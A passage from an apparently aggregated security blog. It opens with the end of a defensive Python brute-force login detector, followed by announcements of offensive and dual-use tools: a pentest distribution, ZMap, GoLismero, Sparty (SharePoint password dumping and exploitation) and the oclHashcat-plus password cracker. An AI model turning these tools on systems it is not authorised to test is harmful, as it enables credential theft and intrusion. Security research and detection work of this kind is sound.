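    r".*?user=(?P<target>\S+)$"
)


def parse_failure(line):
    """Return {"ts", "service", "ruser", "target"} for a pam_unix authentication
    failure line, or None for any other line."""
    m = FAILURE_RE.match(line.rstrip("\n"))
    if m is None:
        return None
    # syslog timestamps carry no year; collapse the padding space in "Sep  2"
    ts = datetime.strptime(" ".join(m.group("ts").split()), "%b %d %H:%M:%S")
    return {"ts": ts, "service": m.group("service"),
            "ruser": m.group("ruser"), "target": m.group("target")}


def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Sliding-window detector: raise one alert per (ruser, target) pair whose
    failures within any window_seconds span reach threshold. A low-and-slow
    guesser lowers the rate but still produces this log line on every
    attempt, so window and threshold are the knobs to tune. Lines are
    assumed to be in chronological order, as they are in the log file."""
    recent = defaultdict(deque)  # (ruser, target) -> timestamps inside the window
    alerted = set()
    alerts = []
    for line in lines:
        ev = parse_failure(line)
        if ev is None:
            continue
        key = (ev["ruser"], ev["target"])
        window = recent[key]
        window.append(ev["ts"])
        while (ev["ts"] - window[0]).total_seconds() > window_seconds:
            window.popleft()
        if len(window) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"ruser": key[0], "target": key[1], "service": ev["service"],
                           "count": len(window),
                           "last_seen": ev["ts"].strftime("%b %d %H:%M:%S")})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG.splitlines()):
        print("ALERT: {count} failed {service} attempts by {ruser} against {target} "
              "(last at {last_seen})".format(**alert))
```

<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">On the sample it raises exactly one alert, for www-data against root, and stays quiet about alice's single typo. The same per-pair window is what pam_faillock or fail2ban apply when they lock an account after a burst of failures, which is the mitigation that makes this kind of guessing impractical.</span></div>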
<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">That's all, have a great day :)</span></div>
</div>
Fahimhttp://www.blogger.com/profile/06549473576655561875noreply@blogger.com0tag:blogger.com,1999:blog-3265662506015756178.post-25817025022617607942013-09-02T13:45:00.004-07:002013-09-02T13:45:59.562-07:00Ubuntu WhiteHat edition<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghc_ditikw2RRqkIefFX-v7LN3mZJ_HoJXgZtkxyCUiRghdXBmqNg9aRGXx_MibdC8bs1Kq6OURpsbl_1kjvLDZ1IELjWtfICFejFxqxSECB2QIDBHC5vT6Hx00EtovtxLLRDT8r9-ool9/s1600/wh.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; outline: none;"><span style="background-color: white; color: black;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghc_ditikw2RRqkIefFX-v7LN3mZJ_HoJXgZtkxyCUiRghdXBmqNg9aRGXx_MibdC8bs1Kq6OURpsbl_1kjvLDZ1IELjWtfICFejFxqxSECB2QIDBHC5vT6Hx00EtovtxLLRDT8r9-ool9/s1600/wh.png" style="border: none; padding: 0px;" /></span></a></div>
<h1 class="title" style="-webkit-transition: background-color 0.2s ease, border 0.2s ease, color 0.2s ease, opacity 0.2s ease-in-out; border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 40px; font-weight: normal; line-height: 1.25; margin: 10px 0px 15px; outline: 0px; padding: 0px; transition: background-color 0.2s ease, border 0.2s ease, color 0.2s ease, opacity 0.2s ease-in-out; vertical-align: baseline;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"><span style="color: black;">Ubuntu WhiteHat edition</span></span></h1>
<ul style="border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; list-style-image: initial; list-style-position: initial; margin: 0px 0px 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<li style="border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Based on Ubuntu 12.10.</span></li>
<li style="border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">32-bit</span></li>
<li style="border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Kernel: 3.5.0-37-generic.</span></li>
<li style="border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Login/pass : root/toor</span></li>
<li style="border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">compat-wireless-3.6.8-1-snpc patched for injection and Handshake capture.</span></li>
</ul>
<div style="border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin: 0px 0px 20px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">The distro is not based on Kali; all the main pentest tools are in the /opt directory and the rest of the executables are located in /usr/bin. This makes most of the scripts run smoothly and keeps them easily customisable. The OS is filled with the latest and best security tools available on the net.</span></div>
<div style="border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Last but not least, the Pentest menu is full of training resources: PDFs, documentation, online courses, briefings and lots more.</span></div>
<div style="border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Download Link- <a href="https://docs.google.com/file/d/0B6CweuCfodlJLWxrVVFKN1BNSVU/edit?usp=sharing" style="outline: none;">https://docs.google.com/file/d/0B6CweuCfodlJLWxrVVFKN1BNSVU/edit?usp=sharing</a></span></div>
<div style="border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">LOGIN / PASS : root/toor</span></div>
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: 13px; line-height: 20px;">Source-<br /><a href="http://top-hat-sec.com/forum/index.php?topic=3441.0" style="outline: none;">http://top-hat-sec.com/forum/index.php?topic=3441.0</a></span></div>
Fahimhttp://www.blogger.com/profile/06549473576655561875noreply@blogger.com0tag:blogger.com,1999:blog-3265662506015756178.post-13480027202103021762013-09-02T13:45:00.002-07:002013-09-02T13:45:25.933-07:00ZMap v1.03 - Fast network scanner designed for Internet<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh714455oUE_naESwYWD7ocQK_sGYwjkrU6_JZqUuaL_9IRkXA_GIUpmbv4rI6PT8RDkGCEc-NkDW5I9bI8DWmbj7UITU5hjnxXiBFjV-1FkgRLx7mKnNHWc7u9A3wfCh4Xe6F1EbZ3ge0m/s1600/logo_test_transparent_monitor.png" imageanchor="1" style="background-color: white; margin-left: 1em; margin-right: 1em; outline: none;"><span style="color: black;"><img border="0" height="106" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh714455oUE_naESwYWD7ocQK_sGYwjkrU6_JZqUuaL_9IRkXA_GIUpmbv4rI6PT8RDkGCEc-NkDW5I9bI8DWmbj7UITU5hjnxXiBFjV-1FkgRLx7mKnNHWc7u9A3wfCh4Xe6F1EbZ3ge0m/s1600/logo_test_transparent_monitor.png" style="border: none; padding: 0px;" width="400" /></span></a></div>
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif; font-size: 13px; line-height: 20px;">ZMap is a fast network scanner designed for Internet-wide network surveys. On a typical desktop computer with a gigabit Ethernet connection, ZMap is capable of scanning the entire public IPv4 address space in under 45 minutes.<br /><br />While previous network tools have been designed to scan small network segments, ZMap is specifically architected to scan the entire address space. It is built in a modular manner in order to allow incorporation with other network survey tools. ZMap operates on GNU/Linux and supports TCP SYN and ICMP echo request scanning out of the box.<br /><br /><a href="https://zmap.io/download.html" style="outline: none;">Download ZMap</a></span><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><span style="font-family: Georgia, 'Times New Roman', serif; font-size: 13px; line-height: 20px;"><a href="https://zmap.io/documentation.html" style="outline: none;">Documentation</a></span></span><br />
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br />For more info:- <a href="https://zmap.io/" style="outline: none;">https://zmap.io</a></span></div>
</div>
Fahimhttp://www.blogger.com/profile/06549473576655561875noreply@blogger.com0tag:blogger.com,1999:blog-3265662506015756178.post-24717636911459247332013-09-02T13:44:00.004-07:002013-09-02T13:44:48.875-07:00GoLismero - The Web Knife Version 2.0 beta Released<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp89TbtZO3Trm9y3okO6PmrN1hHY2waOE4aahZ5grd-9UJ98g2fUAxm_C3YAm4pzDHuyWFTo7CswJSTMhQQ-ViXXFsBBsEv9OD2DnTZVkTYX5UoRYzcyvBGvXJ_2s0hea6cnulE_YVJmQE/s1600/0.png" imageanchor="1" style="background-color: white; margin-left: 1em; margin-right: 1em; outline: none;"><span style="color: black;"><img border="0" height="252" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp89TbtZO3Trm9y3okO6PmrN1hHY2waOE4aahZ5grd-9UJ98g2fUAxm_C3YAm4pzDHuyWFTo7CswJSTMhQQ-ViXXFsBBsEv9OD2DnTZVkTYX5UoRYzcyvBGvXJ_2s0hea6cnulE_YVJmQE/s1600/0.png" style="border: none; padding: 0px;" width="320" /></span></a></div>
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: 13px; line-height: 20px;">GoLismero is an open source security tool that can run its own security tests and drive a lot of well-known security tools (OpenVAS, Wfuzz, SQLMap, DNS recon, robot analyzer...), take their results, feed them back to the rest of the tools and merge all of the results, all of this automatically.<br /><br />GoLismero is a complete framework with a plugin system and integration with a lot of open source tools.<br /><br />Why use GoLismero?<br /><br />There are many reasons to use GoLismero 2.0. The most interesting features of the framework, and why you would want to use it, are:</span><br />
<ul style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin: 0px 20px 20px 0px; padding-left: 40px;">
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">It is open source.</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Real platform independence. Tested on Windows, Linux, *BSD and OS X.</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">No native library dependencies. All of the framework has been written in pure Python.</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Good performance when compared with other frameworks written in Python and other scripting languages.</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Very easy to use.</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Plugin development is extremely simple.</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">The framework also collects and unifies the results of well known tools: sqlmap, xsser, openvas, dnsrecon, theharvester...</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Integration with standards: CWE, CVE and OWASP.</span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Designed with cluster deployment in mind (not available yet).</span></li>
</ul>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<a href="http://golismero-project.com/downloads.aspx" style="outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;">Download from here</span></span></a></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Source-</span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<a href="http://golismero-project.com/" style="outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;">http://golismero-project.com/</span></span></a></div>
</div>
Fahimhttp://www.blogger.com/profile/06549473576655561875noreply@blogger.com0tag:blogger.com,1999:blog-3265662506015756178.post-53875665038267799242013-09-02T13:44:00.000-07:002013-09-02T13:44:14.662-07:00Sparty - MS Sharepoint and Frontpage Auditing Tool<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-family: Georgia, 'Times New Roman', serif;">Sparty is an open source tool written in Python to audit web applications built on the SharePoint and FrontPage architecture. The motivation behind this tool is to provide an easy and robust way to scrutinize the security configuration of SharePoint and FrontPage based web applications. Because of the complexity of this web administration software, a simple and efficient tool is needed that gathers information, checks access permissions, dumps critical information from default files and performs automated exploitation if security risks are identified. A number of automated scanners fall short of this, and Sparty is a solution to that.</span></span><br />
<h3 style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 20px; font-weight: normal; line-height: 20px; margin-bottom: 16px;">
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Version 0.1 - Functionality !</span></h3>
<ul style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin: 0px 20px 20px 0px; padding-left: 40px;">
<li style="margin-bottom: 0.5em;"><span style="font-family: Georgia, 'Times New Roman', serif;">Sharepoint and Frontpage Version Detection!</span></li>
<li style="margin-bottom: 0.5em;"><span style="font-family: Georgia, 'Times New Roman', serif;">Dumping Password from Exposed Configuration Files!</span></li>
<li style="margin-bottom: 0.5em;"><span style="font-family: Georgia, 'Times New Roman', serif;">Exposed Sharepoint/Frontpage Services Scan!</span></li>
<li style="margin-bottom: 0.5em;"><span style="font-family: Georgia, 'Times New Roman', serif;">Exposed Directory Check!</span></li>
<li style="margin-bottom: 0.5em;"><span style="font-family: Georgia, 'Times New Roman', serif;">Installed File and Access Rights Check!</span></li>
<li style="margin-bottom: 0.5em;"><span style="font-family: Georgia, 'Times New Roman', serif;">RPC Service Querying!</span></li>
<li style="margin-bottom: 0.5em;"><span style="font-family: Georgia, 'Times New Roman', serif;">File Enumeration!</span></li>
<li style="margin-bottom: 0.5em;"><span style="font-family: Georgia, 'Times New Roman', serif;">File Uploading Check!</span></li>
</ul>
<h3 style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 20px; font-weight: normal; line-height: 20px; margin-bottom: 16px;">
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Documentation - Usage Examples:</span></h3>
<ul style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin: 0px 20px 20px 0px; padding-left: 40px;">
<li style="margin-bottom: 0.5em;"><span style="font-family: Georgia, 'Times New Roman', serif;">Detailed examples have been shown here: <b><a href="http://sparty.secniche.org/usage.html" style="outline: none;">Sparty Usage.</a></b></span></li>
</ul>
<h3 style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 20px; font-weight: normal; line-height: 20px; margin-bottom: 16px;">
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Download !</span></h3>
<ul style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin: 0px 20px 20px 0px; padding-left: 40px;">
<li style="margin-bottom: 0.5em;"><b><a href="http://sparty.secniche.org/sparty_v_0.1.tar.gz" style="outline: none;"><span style="font-family: Georgia, 'Times New Roman', serif;">Sparty Version 0.1</span></a></b></li>
</ul>
<h3 style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 20px; font-weight: normal; line-height: 20px; margin-bottom: 16px;">
<span style="font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Installation !</span></h3>
<ul style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin: 0px 20px 20px 0px; padding-left: 40px;">
<li style="margin-bottom: 0.5em;"><span style="font-family: Georgia, 'Times New Roman', serif;">Step 1: # gunzip sparty_v_0.1.tar.gz</span></li>
<li style="margin-bottom: 0.5em;"><span style="font-family: Georgia, 'Times New Roman', serif;">Step 2: # tar -xvf sparty_v_0.1.tar</span></li>
<li style="margin-bottom: 0.5em;"><span style="font-family: Georgia, 'Times New Roman', serif;">Avoid using : # tar zxvf sparty_v_0.1.tar.gz</span></li>
</ul>
<div style="color: #909090; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Source-</span></div>
<div style="color: #909090; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<a href="http://sparty.secniche.org/" style="color: #d86513; outline: none;"><span style="background-color: white; color: black; font-family: Georgia, 'Times New Roman', serif;">http://sparty.secniche.org/</span></a></div>
</div>
Fahimhttp://www.blogger.com/profile/06549473576655561875noreply@blogger.com0tag:blogger.com,1999:blog-3265662506015756178.post-9672636555820328882013-09-02T13:42:00.003-07:002013-09-02T13:42:35.308-07:00OclHashcat-plus v0.15 released<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="background-color: white; border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;">
<span style="font-family: Georgia, 'Times New Roman', serif;">OclHashcat-plus is a GPGPU-based multi-hash cracker using a brute-force attack (implemented as <a href="http://hashcat.net/wiki/doku.php?id=mask_attack" style="-webkit-transition: background-color 0.2s ease, border 0.2s ease, color 0.2s ease, opacity 0.2s ease-in-out; background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; transition: background-color 0.2s ease, border 0.2s ease, color 0.2s ease, opacity 0.2s ease-in-out; vertical-align: baseline;" title="mask_attack">mask attack</a>), <a href="http://hashcat.net/wiki/doku.php?id=combinator_attack" style="-webkit-transition: background-color 0.2s ease, border 0.2s ease, color 0.2s ease, opacity 0.2s ease-in-out; background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; transition: background-color 0.2s ease, border 0.2s ease, color 0.2s ease, opacity 0.2s ease-in-out; vertical-align: baseline;" title="combinator_attack">combinator attack</a>, <a href="http://hashcat.net/wiki/doku.php?id=dictionary_attack" style="-webkit-transition: background-color 0.2s ease, border 0.2s ease, color 0.2s ease, opacity 0.2s ease-in-out; background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; transition: background-color 0.2s ease, border 0.2s ease, color 0.2s ease, opacity 0.2s ease-in-out; vertical-align: baseline;" title="dictionary_attack">dictionary attack</a>, <a href="http://hashcat.net/wiki/doku.php?id=hybrid_attack" style="-webkit-transition: background-color 0.2s ease, border 0.2s ease, color 0.2s ease, opacity 0.2s ease-in-out; background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; transition: background-color 0.2s ease, border 0.2s ease, color 0.2s ease, opacity 0.2s ease-in-out; vertical-align: baseline;" title="hybrid_attack">hybrid attack</a>, <a href="http://hashcat.net/wiki/doku.php?id=mask_attack" style="-webkit-transition: background-color 0.2s ease, border 0.2s ease, color 0.2s ease, opacity 0.2s ease-in-out; background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; transition: background-color 0.2s ease, border 0.2s ease, color 0.2s ease, opacity 0.2s ease-in-out; vertical-align: baseline;" title="mask_attack">mask attack</a>, and <a href="http://hashcat.net/wiki/doku.php?id=rule_based_attack" style="-webkit-transition: background-color 0.2s ease, border 0.2s ease, color 0.2s ease, opacity 0.2s ease-in-out; background-color: transparent; border: 0px; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; transition: background-color 0.2s ease, border 0.2s ease, color 0.2s ease, opacity 0.2s ease-in-out; vertical-align: baseline;" title="rule_based_attack">rule-based attack</a>.</span></div>
<div style="background-color: white; border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="font-family: Georgia, 'Times New Roman', serif;">This version is the result of over 6 months of work, having modified 618,473 total lines of source code.</span></div>
<div style="background-color: white; border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="font-family: Georgia, 'Times New Roman', serif;">Before we go into the details of the changes, here’s a quick summary of the major changes:</span></div>
<ul style="background-color: white; border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; list-style-image: initial; list-style-position: initial; margin: 0px 0px 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">Added support for cracking passwords longer than 15 characters</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">Added support for mask-files, which enables password policy-specific candidate generation using PACK</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">Added support for multiple dictionaries in attack modes other than straight mode</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">Rewrote workload dispatcher from scratch</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">Rewrote restore support from scratch</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">Rewrote kernel scheduler to reduce screen lags</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">Better handling of smaller workloads/dictionaries</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">Language-specific charset presets for use with masks</span></li>
</ul>
<div style="background-color: white; border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="font-family: Georgia, 'Times New Roman', serif;">New supported algorithms:</span></div>
<ul style="background-color: white; border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; list-style-image: initial; list-style-position: initial; margin: 0px 0px 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">TrueCrypt 5.0+</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">1Password</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">Lastpass</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">OpenLDAP {SSHA512}</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">AIX {SMD5} and {SSHA*}</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">SHA256(Unix) aka sha256crypt</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">MacOSX v10.8</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">Microsoft SQL Server 2012</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">Microsoft EPi Server v4+</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">Samsung Android Password/PIN</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">GRUB2</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">RipeMD160, Whirlpool, sha256-unicode, sha512-unicode, …</span></li>
</ul>
<div style="background-color: white; border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="font-family: Georgia, 'Times New Roman', serif;">New supported GPUs:</span></div>
<div style="background-color: white; border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="font-family: Georgia, 'Times New Roman', serif;">NVidia:</span></div>
<ul style="background-color: white; border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; list-style-image: initial; list-style-position: initial; margin: 0px 0px 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">All sm_35-based GPUs</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">GTX Titan</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">GTX 7xx</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">Tesla K20</span></li>
</ul>
<div style="background-color: white; border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="font-family: Georgia, 'Times New Roman', serif;">AMD:</span></div>
<ul style="background-color: white; border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 22px; list-style-image: initial; list-style-position: initial; margin: 0px 0px 20px; outline: 0px; padding: 0px; vertical-align: baseline;">
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">All Caicos, Oland, Bonaire, Kalindi and Hainan-based GPUs/APUs</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">hd77xx</span></li>
<li style="background-color: transparent; border: 0px; margin: 0px 0px 0px 30px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;">hd8xxx</span></li>
</ul>
<div style="color: #909090; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
